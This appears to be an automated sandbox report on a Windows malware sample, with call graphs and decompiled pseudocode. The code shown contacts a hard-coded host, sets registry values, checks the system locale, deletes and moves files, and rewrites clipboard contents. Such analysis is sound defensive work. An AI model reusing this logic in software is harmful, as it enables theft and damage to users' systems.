5457 40dd08 5455->5457 5456->5449 5459 40e0a0 8 API calls 5457->5459 5458->5449 5458->5455 5460 40dd0d 5459->5460 5460->5444 5771 40bca0 5776 40e9e0 5771->5776 5773 40bcb5 5774 40e9e0 16 API calls 5773->5774 5775 40bcd3 5773->5775 5774->5775 5777 40eabb 5776->5777 5778 40e9f0 5776->5778 5777->5773 5778->5777 5779 408e40 7 API calls 5778->5779 5780 40ea18 5779->5780 5780->5777 5781 409020 8 API calls 5780->5781 5782 40ea44 5781->5782 5783 40ea60 5782->5783 5784 40ea51 5782->5784 5786 40e960 4 API calls 5783->5786 5785 408fb0 __aligned_recalloc_base 3 API calls 5784->5785 5787 40ea57 5785->5787 5788 40ea6d 5786->5788 5787->5773 5789 40ea76 EnterCriticalSection 5788->5789 5790 40eaac 5788->5790 5791 40ea99 LeaveCriticalSection 5789->5791 5792 40ea8d 5789->5792 5793 408fb0 __aligned_recalloc_base 3 API calls 5790->5793 5791->5773 5792->5791 5794 40eab5 5793->5794 5795 408fb0 __aligned_recalloc_base 3 API calls 5794->5795 5795->5777 5796 40e7a0 GetTickCount WaitForSingleObject 5797 40e949 5796->5797 5798 40e7cd WSAWaitForMultipleEvents 5796->5798 5799 40e870 GetTickCount 5798->5799 5800 40e7ea WSAEnumNetworkEvents 5798->5800 5801 40e8c3 GetTickCount 5799->5801 5802 40e885 EnterCriticalSection 5799->5802 5800->5799 5810 40e803 5800->5810 5803 40e935 WaitForSingleObject 5801->5803 5804 40e8ce EnterCriticalSection 5801->5804 5805 40e896 5802->5805 5806 40e8ba LeaveCriticalSection 5802->5806 5803->5797 5803->5798 5807 40e921 LeaveCriticalSection GetTickCount 5804->5807 5808 40e8df InterlockedExchangeAdd 5804->5808 5812 40e8a9 LeaveCriticalSection 5805->5812 5838 40e6a0 5805->5838 5806->5803 5807->5803 5848 40c210 NtQuerySystemTime RtlTimeToSecondsSince1980 5808->5848 5809 40e812 accept 5809->5799 5809->5810 5810->5799 5810->5809 5817 40eb70 7 API calls 5810->5817 5818 40e330 5810->5818 5812->5803 5815 40e8f2 5815->5807 5815->5808 5849 409940 shutdown closesocket 5815->5849 5817->5799 5819 40e342 EnterCriticalSection 5818->5819 5820 40e33d 5818->5820 5821 40e357 5819->5821 5822 40e36d LeaveCriticalSection 5819->5822 5820->5810 5821->5822 5823 40e378 5822->5823 5824 40e37f 5822->5824 5823->5810 5825 408e40 7 API calls 5824->5825 5826 40e389 5825->5826 5827 40e396 getpeername CreateIoCompletionPort 5826->5827 5828 40e428 5826->5828 5830 40e422 5827->5830 5831 40e3d6 5827->5831 5852 409940 shutdown closesocket 5828->5852 5833 408fb0 __aligned_recalloc_base 3 API calls 5830->5833 5850 40c210 NtQuerySystemTime RtlTimeToSecondsSince1980 5831->5850 5833->5828 5834 40e433 5834->5810 5835 40e3db InterlockedExchange InitializeCriticalSection InterlockedIncrement 5851 40e250 EnterCriticalSection LeaveCriticalSection 5835->5851 5837 40e41b 5837->5810 5839 40e6b0 5838->5839 5846 40e781 5838->5846 5840 40e6bd InterlockedExchangeAdd 5839->5840 5839->5846 5840->5846 5847 40e6d4 5840->5847 5841 40e700 5842 40e711 5841->5842 5862 409940 shutdown closesocket 5841->5862 5843 40e727 InterlockedDecrement 5842->5843 5842->5846 5843->5846 5846->5806 5847->5841 5847->5846 5853 40e620 EnterCriticalSection 5847->5853 5848->5815 5849->5815 5850->5835 5851->5837 5852->5834 5854 40e687 LeaveCriticalSection 5853->5854 5855 40e63a InterlockedExchangeAdd 5853->5855 5854->5847 5856 40e64a LeaveCriticalSection 5855->5856 5857 40e659 5855->5857 5856->5847 5858 408fb0 __aligned_recalloc_base 3 API calls 5857->5858 5859 40e67e 5858->5859 5860 408fb0 __aligned_recalloc_base 3 API calls 5859->5860 5861 40e684 5860->5861 5861->5854 5862->5842 5461 404565 5463 4044de 5461->5463 5462 40456a LeaveCriticalSection 5463->5462 5464 409020 8 API calls 5463->5464 5465 40453c 5464->5465 5465->5462 5863 404f25 5866 404ecb 5863->5866 5864 404efb lstrcmpiW 5864->5866 5865 405076 FindNextFileW 5868 405092 FindClose 5865->5868 5869 404e9f lstrcmpW 5865->5869 5866->5864 5866->5865 5867 404f62 PathMatchSpecW 5866->5867 5870 404fe0 PathFileExistsW 5866->5870 5876 404a90 11 API calls 5866->5876 5867->5866 5872 404f83 wsprintfW SetFileAttributesW DeleteFileW 5867->5872 5873 40509f 5868->5873 5869->5866 5871 404eb5 lstrcmpW 5869->5871 5870->5866 5874 404ff6 wsprintfW wsprintfW 5870->5874 5871->5866 5872->5866 5874->5866 5875 405060 MoveFileExW 5874->5875 5875->5865 5876->5866 5466 40de70 5467 40de85 ioctlsocket 5466->5467 5468 40df50 5467->5468 5476 40deaa 5467->5476 5469 408fb0 __aligned_recalloc_base 3 API calls 5468->5469 5471 40df56 5469->5471 5470 40df39 WaitForSingleObject 5470->5467 5470->5468 5472 40ded4 recvfrom 5472->5470 5472->5476 5473 408ea0 9 API calls 5473->5476 5474 40df19 InterlockedExchangeAdd 5477 40dd40 5474->5477 5476->5470 5476->5472 5476->5473 5476->5474 5478 40dd75 5477->5478 5479 40dd9f 5478->5479 5480 408e40 7 API calls 5478->5480 5487 40c210 NtQuerySystemTime RtlTimeToSecondsSince1980 5479->5487 5480->5479 5482 40ddc2 5488 40e1d0 5482->5488 5484 40de5e 5484->5476 5485 40ddd5 5485->5484 5486 40de4b memmove 5485->5486 5486->5485 5487->5482 5489 40e1e2 5488->5489 5490 40e1f5 memcpy 5488->5490 5491 408ea0 9 API calls 5489->5491 5493 40e211 5490->5493 5492 40e1ef 5491->5492 5492->5490 5493->5485 5494 40c270 5495 40a4f0 115 API calls 5494->5495 5496 40c2a8 5495->5496 5877 4050b0 Sleep GetModuleFileNameW 5878 40d530 3 API calls 5877->5878 5879 4050e0 5878->5879 5880 405238 ExitThread 5879->5880 5881 4048c0 4 API calls 5879->5881 5882 405228 Sleep 5879->5882 5883 405119 5879->5883 5881->5879 5882->5879 5884 404860 4 API calls 5883->5884 5885 40512a 5884->5885 5886 405150 GetVolumeInformationW GetDiskFreeSpaceExW _aulldiv wsprintfW 5885->5886 5887 40514b 5885->5887 5888 4051c6 wsprintfW 5886->5888 5889 4051db wsprintfW 5886->5889 5888->5889 5890 404bd0 49 API calls 5889->5890 5890->5887 5891 403db0 GetWindowLongW 5892 403dd4 5891->5892 5893 403df6 5891->5893 5894 403de1 5892->5894 5895 403e67 IsClipboardFormatAvailable 5892->5895 5896 403df1 5893->5896 5902 403e46 5893->5902 5903 403e2e SetWindowLongW 5893->5903 5899 403e04 SetClipboardViewer SetWindowLongW 5894->5899 5900 403de7 5894->5900 5897 403e83 IsClipboardFormatAvailable 5895->5897 5898 403e7a 5895->5898 5901 403fe4 DefWindowProcA 5896->5901 5897->5898 5904 403e98 IsClipboardFormatAvailable 5897->5904 5907 403eb5 OpenClipboard 5898->5907 5925 403f7c 5898->5925 5899->5901 5900->5896 5905 403f9d RegisterRawInputDevices ChangeClipboardChain 5900->5905 5902->5896 5906 403e4c SendMessageA 5902->5906 5903->5896 5904->5898 5905->5901 5906->5896 5909 403ec5 GetClipboardData 5907->5909 5907->5925 5908 403f85 SendMessageA 5908->5896 5909->5896 5910 403edd GlobalLock 5909->5910 5910->5896 5911 403ef5 5910->5911 5912 403f08 5911->5912 5913 403f29 5911->5913 5915 403f3e 5912->5915 5916 403f0e 5912->5916 5914 40b570 13 API calls 5913->5914 5917 403f14 GlobalUnlock CloseClipboard 5914->5917 5932 403ce0 5915->5932 5916->5917 5926 403bd0 5916->5926 5921 403f67 5917->5921 5917->5925 5940 403480 lstrlenW 5921->5940 5924 408fb0 __aligned_recalloc_base 3 API calls 5924->5925 5925->5896 5925->5908 5930 403bdb 5926->5930 5927 403be1 lstrlenW 5929 403bf4 5927->5929 5927->5930 5928 408e60 __aligned_recalloc_base 7 API calls 5928->5930 5929->5917 5930->5927 5930->5928 5930->5929 5931 403c11 lstrcpynW 5930->5931 5931->5929 5931->5930 5937 403ced 5932->5937 5933 403cf3 lstrlenA 5933->5937 5938 403d06 5933->5938 5934 403b70 2 API calls 5934->5937 5935 408e60 __aligned_recalloc_base 7 API calls 5935->5937 5937->5933 5937->5934 5937->5935 5937->5938 5939 408fb0 __aligned_recalloc_base 3 API calls 5937->5939 5969 403c90 5937->5969 5938->5917 5939->5937 5941 4034b0 5940->5941 5942 403619 5941->5942 5943 403666 StrStrW 5941->5943 5947 40362b 5941->5947 5942->5924 5944 403691 StrStrW 5943->5944 5943->5947 5946 4036b9 StrStrW 5944->5946 5944->5947 5945 403724 StrStrW 5948 40373b 5945->5948 5952 4037ce StrStrW 5945->5952 5946->5947 5947->5942 5947->5945 5948->5942 5949 403794 isalpha 5948->5949 5948->5952 5949->5948 5950 4037ab isdigit 5949->5950 5950->5942 5950->5948 5953 4039b5 5952->5953 5954 4039bc StrStrW 5952->5954 5953->5954 5955 4039cf StrStrW 5954->5955 5957 4039fb 5955->5957 5958 403a5e StrStrW 5957->5958 5964 403aa5 lstrlenA 5957->5964 5959 403a71 5958->5959 5960 403a78 StrStrW 5958->5960 5959->5960 5961 403a92 StrStrW 5960->5961 5962 403a8b 5960->5962 5961->5964 5962->5961 5964->5942 5965 403af5 GlobalAlloc 5964->5965 5965->5942 5966 403b10 GlobalLock 5965->5966 5966->5942 5967 403b23 memcpy GlobalUnlock OpenClipboard 5966->5967 5967->5942 5968 403b50 EmptyClipboard SetClipboardData CloseClipboard 5967->5968 5968->5942 5972 403c9b 5969->5972 5970 403ca1 lstrlenA 5970->5972 5971 403b70 2 API calls 5971->5972 5972->5970 5972->5971 5973 403cd4 5972->5973 5973->5937 5497 40caf1 5499 40cafa 5497->5499 5498 40cbed 5499->5498 5500 40cb63 lstrcmpiW 5499->5500 5501 40cbe3 SysFreeString 5500->5501 5502 40cb76 5500->5502 5501->5498 5503 40c5b0 2 API calls 5502->5503 5505 40cb84 5503->5505 5504 40cbd5 5504->5501 5505->5501 5505->5504 5506 40cbb3 lstrcmpiW 5505->5506 5507 40cbc5 5506->5507 5508 40cbcb SysFreeString 5506->5508 5507->5508 5508->5504 5509 406979 5510 406982 5509->5510 5511 406991 34 API calls 5510->5511 5512 4077c6 5510->5512

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 110 40d4a0-40d4c3 GetLocaleInfoA 111 40d4c6-40d4d3 110->111 112 40d503-40d508 111->112 113 40d4d5-40d4d9 111->113 114 40d50b-40d515 112->114 115 40d4fa-40d501 113->115 116 40d4db-40d4ea 113->116 117 40d517-40d519 114->117 118 40d51b 114->118 115->114 116->112 119 40d4ec-40d4f8 116->119 120 40d51d-40d520 117->120 118->120 119->111 119->115
                                                                                  C-Code - Quality: 92%
                                                                                  			E0040D4A0() {
                                                                                  				char _v16;
                                                                                  				intOrPtr* _v20;
                                                                                  				intOrPtr* _v24;
                                                                                  				char _v25;
                                                                                  				char _v26;
                                                                                  				intOrPtr _v32;
                                                                                  				intOrPtr _v36;
                                                                                  				char _t26;
                                                                                  				char _t30;
                                                                                  				intOrPtr* _t34;
                                                                                  
                                                                                  				GetLocaleInfoA(0x400, 7,  &_v16, 0xa); // executed
                                                                                  				_v20 = 0x410368;
                                                                                  				_v24 =  &_v16;
                                                                                  				while(1) {
                                                                                  					_t34 = _v24;
                                                                                  					_t26 =  *_t34;
                                                                                  					_v25 = _t26;
                                                                                  					if(_t26 !=  *_v20) {
                                                                                  						break;
                                                                                  					}
                                                                                  					if(_v25 == 0) {
                                                                                  						L5:
                                                                                  						_v32 = 0;
                                                                                  						L7:
                                                                                  						_v36 = _v32;
                                                                                  						if(_v36 != 0) {
                                                                                  							return 0;
                                                                                  						}
                                                                                  						return 1;
                                                                                  					}
                                                                                  					_t34 = _v24;
                                                                                  					_t30 =  *((intOrPtr*)(_t34 + 1));
                                                                                  					_v26 = _t30;
                                                                                  					_t13 = _v20 + 1; // 0x6f00524b
                                                                                  					if(_t30 !=  *_t13) {
                                                                                  						break;
                                                                                  					}
                                                                                  					_v24 = _v24 + 2;
                                                                                  					_v20 = _v20 + 2;
                                                                                  					if(_v26 != 0) {
                                                                                  						continue;
                                                                                  					}
                                                                                  					goto L5;
                                                                                  				}
                                                                                  				asm("sbb edx, edx");
                                                                                  				asm("sbb edx, 0xffffffff");
                                                                                  				_v32 = _t34;
                                                                                  				goto L7;
                                                                                  			}













                                                                                  0x0040d4b3
                                                                                  0x0040d4b9
                                                                                  0x0040d4c3
                                                                                  0x0040d4c6
                                                                                  0x0040d4c6
                                                                                  0x0040d4c9
                                                                                  0x0040d4cb
                                                                                  0x0040d4d3
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040d4d9
                                                                                  0x0040d4fa
                                                                                  0x0040d4fa
                                                                                  0x0040d50b
                                                                                  0x0040d50e
                                                                                  0x0040d515
                                                                                  0x00000000
                                                                                  0x0040d51b
                                                                                  0x00000000
                                                                                  0x0040d517
                                                                                  0x0040d4db
                                                                                  0x0040d4de
                                                                                  0x0040d4e1
                                                                                  0x0040d4e7
                                                                                  0x0040d4ea
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040d4ec
                                                                                  0x0040d4f0
                                                                                  0x0040d4f8
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040d4f8
                                                                                  0x0040d503
                                                                                  0x0040d505
                                                                                  0x0040d508
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • GetLocaleInfoA.KERNELBASE(00000400,00000007,?,0000000A,?,?,?,?,?,?,?,00406323), ref: 0040D4B3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: InfoLocale
                                                                                  • String ID:
                                                                                  • API String ID: 2299586839-0
                                                                                  • Opcode ID: 611403d475bc268a560fb48b2f5e81d27d633618192b5c869a563e9a8d5f4499
                                                                                  • Instruction ID: e9994f08d7126ec26206465890822c5d7dfef59af955b2bd7cc84378f3fe3710
                                                                                  • Opcode Fuzzy Hash: 611403d475bc268a560fb48b2f5e81d27d633618192b5c869a563e9a8d5f4499
                                                                                  • Instruction Fuzzy Hash: 92114C74D0824D9FDF11CFE4C8447FEBBB1AB5A314F04829AD861362C1C3785A4ACBA6
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 0 405a20-405a3e Sleep 1 405a48-405a54 0->1 2 405a5a-405a74 FindWindowA 1->2 3 4061df-4061ff CreateMutexA GetLastError 1->3 6 405a7a-405abf Sleep MoveFileA * 2 FindWindowA 2->6 7 4061cb-4061da 2->7 4 406201-406203 ExitProcess 3->4 5 406209-40628e GetModuleFileNameW PathFindFileNameW wsprintfW DeleteFileW ExpandEnvironmentStringsW 3->5 8 406294-4062ad 5->8 9 405ac1-405ad6 Sleep MoveFileA 6->9 10 405adc-405af1 Sleep 6->10 7->1 12 4062fa-4062ff 8->12 13 4062af-4062b7 8->13 9->10 11 405b02-405b0c 10->11 14 405b7a-405bfc DeleteFileW MoveFileW DeleteFileW MoveFileW DeleteFileW Sleep * 2 InternetOpenA DeleteFileW 11->14 15 405b0e-405b75 DeleteFileW MoveFileW Sleep DeleteFileW MoveFileW * 2 Sleep DeleteFileA 11->15 18 406305-406318 12->18 16 4062b9-4062d4 13->16 17 4062ee-4062f8 13->17 20 405c02-405c7b DeleteFileW MoveFileA Sleep DeleteFileW Sleep DeleteFileW InternetOpenUrlA Sleep 14->20 21 405cf4-405d73 Sleep InternetCloseHandle Sleep ShowWindow SetForegroundWindow MoveFileA 14->21 15->11 16->12 22 4062d6-4062ec 16->22 17->18 23 406581-4065ac Sleep RegOpenKeyExA 18->23 24 40631e-406329 call 40d4a0 18->24 27 405cdc-405cee InternetCloseHandle DeleteFileW 20->27 28 405c7d-405c87 20->28 29 405d79-405ded MoveFileW DeleteFileW MoveFileW Sleep DeleteFileA FindWindowA InternetOpenA 21->29 30 405fca-405fd4 21->30 22->8 22->17 25 4065b2-406692 RegSetValueExA * 7 RegCloseKey 23->25 26 406698-4066b8 RegOpenKeyExA 23->26 40 406333-406381 ExpandEnvironmentStringsW wsprintfW CopyFileW 24->40 41 40632b-40632d ExitProcess 24->41 25->26 32 4067a4-4067b9 Sleep call 40b4a0 26->32 33 4066be-40679e RegSetValueExA * 7 RegCloseKey 26->33 27->21 34 405c98-405ca2 28->34 36 405df3-405e3a MoveFileW * 2 InternetOpenUrlA 29->36 37 405e9b-405eba InternetCloseHandle Sleep 29->37 35 405fde-405fea 30->35 62 40690f-406918 32->62 63 4067bf-40690c WSAStartup wsprintfW * 2 CreateThread Sleep CreateThread Sleep CreateThread Sleep call 404200 call 40d3d0 call 4057b0 CreateEventA call 40abd0 call 40bea0 call 40a020 call 40bf50 * 4 32->63 33->32 34->27 45 405ca4-405cda MoveFileW Sleep MoveFileA Sleep 34->45 42 406055-406062 PathFileExistsA 35->42 43 405fec-406006 FindWindowA 35->43 46 405e83-405e95 InternetCloseHandle Sleep 36->46 47 405e3c-405e7d DeleteFileW Sleep DeleteFileA MoveFileW Sleep DeleteFileW 36->47 37->30 39 405ec0-405f12 ShowWindow DeleteFileW SetForegroundWindow Sleep InternetOpenA 37->39 48 405f18-405f3f InternetOpenUrlA 39->48 49 405fbd-405fc4 InternetCloseHandle 39->49 50 406460-4064a2 Sleep wsprintfW CopyFileW 40->50 51 406387-4063b6 SetFileAttributesW RegOpenKeyExW 40->51 56 406064-4060d1 DeleteFileA DeleteFileW Sleep DeleteFileW * 6 MoveFileW 42->56 57 4060d7-4060f1 FindWindowA 42->57 52 406053 43->52 53 406008-40604d Sleep DeleteFileW MoveFileW Sleep * 2 43->53 45->34 46->37 47->46 58 405f41-405f61 MoveFileW Sleep DeleteFileW 48->58 59 405f67-405fb7 InternetCloseHandle DeleteFileW Sleep MoveFileA DeleteFileW MoveFileW DeleteFileA 48->59 49->30 50->23 64 4064a8-4064d7 SetFileAttributesW RegOpenKeyExW 50->64 60 406441-406456 call 40d740 51->60 61 4063bc-4063d1 51->61 52->35 53->52 56->57 65 4060f3-406166 DeleteFileW SetForegroundWindow ShowWindow Sleep MoveFileA DeleteFileA Sleep DeleteFileW * 3 57->65 66 40616c-406176 57->66 58->59 59->49 60->50 83 406458-40645a ExitProcess 60->83 68 4063d7-4063f6 61->68 63->62 71 406562-406577 call 40d740 64->71 72 4064dd-4064f2 64->72 65->66 73 406187-406191 66->73 68->68 77 4063f8-40643b RegSetValueExW RegCloseKey 68->77 71->23 86 406579-40657b ExitProcess 71->86 80 4064f8-406517 72->80 73->7 76 406193-4061c9 MoveFileW DeleteFileW Sleep MoveFileW 73->76 76->73 77->60 80->80 85 406519-40655c RegSetValueExW RegCloseKey 80->85 85->71
                                                                                  C-Code - Quality: 98%
                                                                                  			_entry_() {
                                                                                  				short _v524;
                                                                                  				char _v528;
                                                                                  				int _v532;
                                                                                  				int _v536;
                                                                                  				char _v1060;
                                                                                  				void* _v1064;
                                                                                  				char _v1588;
                                                                                  				short _v2108;
                                                                                  				intOrPtr _v2112;
                                                                                  				short _v2636;
                                                                                  				void* _v2640;
                                                                                  				struct HWND__* _v2644;
                                                                                  				long _v2648;
                                                                                  				struct HWND__* _v2652;
                                                                                  				void* _v2656;
                                                                                  				intOrPtr _v2660;
                                                                                  				long _v2664;
                                                                                  				void* _v2668;
                                                                                  				intOrPtr _v2672;
                                                                                  				intOrPtr _v2676;
                                                                                  				struct HWND__* _v2680;
                                                                                  				int _v2684;
                                                                                  				int _v2688;
                                                                                  				struct HWND__* _v2692;
                                                                                  				struct HWND__* _v2696;
                                                                                  				int _v2700;
                                                                                  				char _v3100;
                                                                                  				intOrPtr* _v3104;
                                                                                  				int _v3108;
                                                                                  				short _v3110;
                                                                                  				short _v3112;
                                                                                  				int _v3116;
                                                                                  				int _v3120;
                                                                                  				intOrPtr* _v3124;
                                                                                  				intOrPtr _v3128;
                                                                                  				short _v3130;
                                                                                  				signed int _v3136;
                                                                                  				intOrPtr* _v3140;
                                                                                  				intOrPtr _v3144;
                                                                                  				short _v3146;
                                                                                  				signed int _v3152;
                                                                                  				void* _t182;
                                                                                  				int _t190;
                                                                                  				intOrPtr _t210;
                                                                                  				signed char _t240;
                                                                                  				int _t245;
                                                                                  				signed char _t253;
                                                                                  				long _t263;
                                                                                  				signed char _t264;
                                                                                  				struct HWND__* _t271;
                                                                                  				short _t367;
                                                                                  				intOrPtr _t371;
                                                                                  				short _t397;
                                                                                  				intOrPtr _t413;
                                                                                  				intOrPtr _t414;
                                                                                  				void* _t446;
                                                                                  				void* _t447;
                                                                                  				void* _t454;
                                                                                  
                                                                                  				Sleep(0x1b58); // executed
                                                                                  				_v536 = 0;
                                                                                  				_v2112 = 0x2332;
                                                                                  				while(_v536 < _v2112) {
                                                                                  					_t271 = FindWindowA("579795729858927452784", 0); // executed
                                                                                  					_v2644 = _t271;
                                                                                  					if(_v2644 == 0) {
                                                                                  						L40:
                                                                                  						_v536 = _v536 + 1;
                                                                                  						continue;
                                                                                  					}
                                                                                  					Sleep(0x3e8);
                                                                                  					MoveFileA("feu8gf8g2gf8g2fg", "579795729858927452784");
                                                                                  					MoveFileA("feu8gf8g2gf8g2fg", "579795729858927452784");
                                                                                  					_v2680 = FindWindowA("579795729858927452784", 0);
                                                                                  					if(_v2680 != 0) {
                                                                                  						Sleep(0x3e8);
                                                                                  						MoveFileA("feu8gf8g2gf8g2fg", "579795729858927452784");
                                                                                  					}
                                                                                  					Sleep(0x3e8);
                                                                                  					_v2684 = 0;
                                                                                  					while(_v2684 < 0x7d0) {
                                                                                  						DeleteFileW(L"argarhargafafargh");
                                                                                  						MoveFileW(L"4yy4w4yw4fwgwgw", L"ffag8f2g8fg82g8f8g8fg");
                                                                                  						Sleep(0xbb8);
                                                                                  						DeleteFileW(L"argarhargafafargh");
                                                                                  						MoveFileW(L"argarhargafafargh", L"argarhrharharfafrahth");
                                                                                  						MoveFileW(L"argarhargafafargh", L"argarhrharharfafrahth");
                                                                                  						Sleep(0xfa0);
                                                                                  						DeleteFileA("579795729858927452784");
                                                                                  						_v2684 = _v2684 + 1;
                                                                                  					}
                                                                                  					DeleteFileW(L"4yy4w4yw4fwgwgw");
                                                                                  					MoveFileW(L"argarhargafafargh", L"argarhrharharfafrahth");
                                                                                  					DeleteFileW(L"argarhargafafargh");
                                                                                  					MoveFileW(L"argarhargafafargh", L"argarhrharharfafrahth");
                                                                                  					DeleteFileW(L"argarhargafafargh");
                                                                                  					Sleep(0xbb8);
                                                                                  					Sleep(0xbb8);
                                                                                  					_v2668 = InternetOpenA("ttyu8ruy8uy8u8yu", 0, 0, 0, 0);
                                                                                  					DeleteFileW(L"ffag8f2g8fg82g8f8g8fg");
                                                                                  					if(_v2668 == 0) {
                                                                                  						L16:
                                                                                  						Sleep(0x7d0);
                                                                                  						InternetCloseHandle(_v2668);
                                                                                  						Sleep(0x2710);
                                                                                  						ShowWindow(_v2644, 1);
                                                                                  						SetForegroundWindow(_v2644);
                                                                                  						MoveFileA("579795729858927452784", "2dgd828d8g8fg8g8g");
                                                                                  						_v2676 = 0x37;
                                                                                  						_v2660 = 0x2c;
                                                                                  						_v2672 = _v2676 + _v2660;
                                                                                  						if(_v2672 < 0x2328) {
                                                                                  							MoveFileW(L"argarhargafafargh", L"argarhrharharfafrahth");
                                                                                  							DeleteFileW(L"argarhargafafargh");
                                                                                  							MoveFileW(L"argarhargafafargh", L"argarhrharharfafrahth");
                                                                                  							Sleep(0x7d0);
                                                                                  							DeleteFileA("2dgd828d8g8fg8g8g");
                                                                                  							_v2692 = FindWindowA("aefafugaugfgauegf", 0);
                                                                                  							_v2668 = InternetOpenA("ttyu8ruy8uy8u8yu", 0, 0, 0, 0);
                                                                                  							if(_v2668 != 0) {
                                                                                  								MoveFileW(L"argarhargafafargh", L"argarhrharharfafrahth");
                                                                                  								MoveFileW(L"argarhargafafargh", L"argarhrharharfafrahth");
                                                                                  								_v2656 = InternetOpenUrlA(_v2668, "http://2462462645.fr/", 0, 0, 0, 0);
                                                                                  								if(_v2656 != 0) {
                                                                                  									DeleteFileW(L"argarhargafafargh");
                                                                                  									Sleep(0x1388);
                                                                                  									DeleteFileA("579795729858927452784");
                                                                                  									MoveFileW(L"4yy4w4yw4fwgwgw", L"argarhrharharfafrahth");
                                                                                  									Sleep(0xfa0);
                                                                                  									DeleteFileW(L"4yy4w4yw4fwgwgw");
                                                                                  								}
                                                                                  								InternetCloseHandle(_v2656);
                                                                                  								Sleep(0xdac);
                                                                                  							}
                                                                                  							InternetCloseHandle(_v2668);
                                                                                  							Sleep(0xfa0);
                                                                                  							if(_v2692 != 0) {
                                                                                  								ShowWindow(_v2692, 0);
                                                                                  								DeleteFileW(L"argarhargafafargh");
                                                                                  								SetForegroundWindow(_v2692);
                                                                                  								Sleep(0x1388);
                                                                                  								_v2668 = InternetOpenA("ttyu8ruy8uy8u8yu", 0, 0, 0, 0);
                                                                                  								if(_v2668 != 0) {
                                                                                  									_v2656 = InternetOpenUrlA(_v2668, "http://2462462645.fr/", 0, 0, 0, 0);
                                                                                  									if(_v2656 != 0) {
                                                                                  										MoveFileW(L"argarhargafafargh", L"argarhrharharfafrahth");
                                                                                  										Sleep(0x2710);
                                                                                  										DeleteFileW(L"4yy4w4yw4fwgwgw");
                                                                                  									}
                                                                                  									InternetCloseHandle(_v2656);
                                                                                  									DeleteFileW(L"argarhargafafargh");
                                                                                  									Sleep(0x64);
                                                                                  									MoveFileA("feu8gf8g2gf8g2fg", "579795729858927452784");
                                                                                  									DeleteFileW(L"argarhargafafargh");
                                                                                  									MoveFileW(L"argarhargafafargh", L"argarhrharharfafrahth");
                                                                                  									DeleteFileA("2dgd828d8g8fg8g8g");
                                                                                  								}
                                                                                  								InternetCloseHandle(_v2668);
                                                                                  							}
                                                                                  						}
                                                                                  						_v2664 = 0x1388;
                                                                                  						_v2648 = 0x1f4;
                                                                                  						while(_v2664 > _v2648) {
                                                                                  							_v2696 = FindWindowA("2dgd828d8g8fg8g8g", 0);
                                                                                  							if(_v2696 != 0) {
                                                                                  								Sleep(0x7d0);
                                                                                  								DeleteFileW(L"argarhargafafargh");
                                                                                  								MoveFileW(L"argarhargafafargh", L"argarhrharharfafrahth");
                                                                                  								Sleep(0x1388);
                                                                                  								Sleep(0x1388);
                                                                                  								_v2648 = _v2648 + 1;
                                                                                  							}
                                                                                  						}
                                                                                  						if(PathFileExistsA("aefafugaugfgauegf") != 0) {
                                                                                  							DeleteFileA("579795729858927452784");
                                                                                  							DeleteFileW(L"4yy4w4yw4fwgwgw");
                                                                                  							Sleep(0x1f4);
                                                                                  							DeleteFileW(L"4yy4w4yw4fwgwgw");
                                                                                  							DeleteFileW(L"4yy4w4yw4fwgwgw");
                                                                                  							DeleteFileW(L"4yy4w4yw4fwgwgw");
                                                                                  							DeleteFileW(L"4yy4w4yw4fwgwgw");
                                                                                  							DeleteFileW(L"4yy4w4yw4fwgwgw");
                                                                                  							DeleteFileW(L"4yy4w4yw4fwgwgw");
                                                                                  							MoveFileW(L"4yy4w4yw4fwgwgw", L"ffag8f2g8fg82g8f8g8fg");
                                                                                  						}
                                                                                  						_v2652 = FindWindowA("aefyaiegfayegfg", 0);
                                                                                  						if(_v2652 != 0) {
                                                                                  							DeleteFileW(L"4yy4w4yw4fwgwgw");
                                                                                  							SetForegroundWindow(_v2644);
                                                                                  							ShowWindow(_v2644, 1);
                                                                                  							Sleep(0x3a98);
                                                                                  							MoveFileA("feu8gf8g2gf8g2fg", "aefafugaugfgauegf");
                                                                                  							DeleteFileA("579795729858927452784");
                                                                                  							Sleep(0x1f4);
                                                                                  							DeleteFileW(L"4yy4w4yw4fwgwgw");
                                                                                  							DeleteFileW(L"4yy4w4yw4fwgwgw");
                                                                                  							DeleteFileW(L"argarhargafafargh");
                                                                                  						}
                                                                                  						_v2700 = 0;
                                                                                  						while(_v2700 < 0xfa0) {
                                                                                  							MoveFileW(L"argarhargafafargh", L"argarhrharharfafrahth");
                                                                                  							DeleteFileW(L"4yy4w4yw4fwgwgw");
                                                                                  							Sleep(0x2328);
                                                                                  							MoveFileW(L"argarhrharharfafrahth", L"4yy4w4yw4fwgwgw");
                                                                                  							_v2700 = _v2700 + 1;
                                                                                  						}
                                                                                  						goto L40;
                                                                                  					}
                                                                                  					DeleteFileW(L"argarhargafafargh");
                                                                                  					MoveFileA("feu8gf8g2gf8g2fg", "579795729858927452784");
                                                                                  					Sleep(0x1388);
                                                                                  					DeleteFileW(L"ffag8f2g8fg82g8f8g8fg");
                                                                                  					Sleep(0xbb8);
                                                                                  					DeleteFileW(L"4yy4w4yw4fwgwgw");
                                                                                  					_v2656 = InternetOpenUrlA(_v2668, "http://2462462645.fr/", 0, 0, 0, 0);
                                                                                  					Sleep(0xbb8);
                                                                                  					if(_v2656 == 0) {
                                                                                  						L15:
                                                                                  						InternetCloseHandle(_v2656);
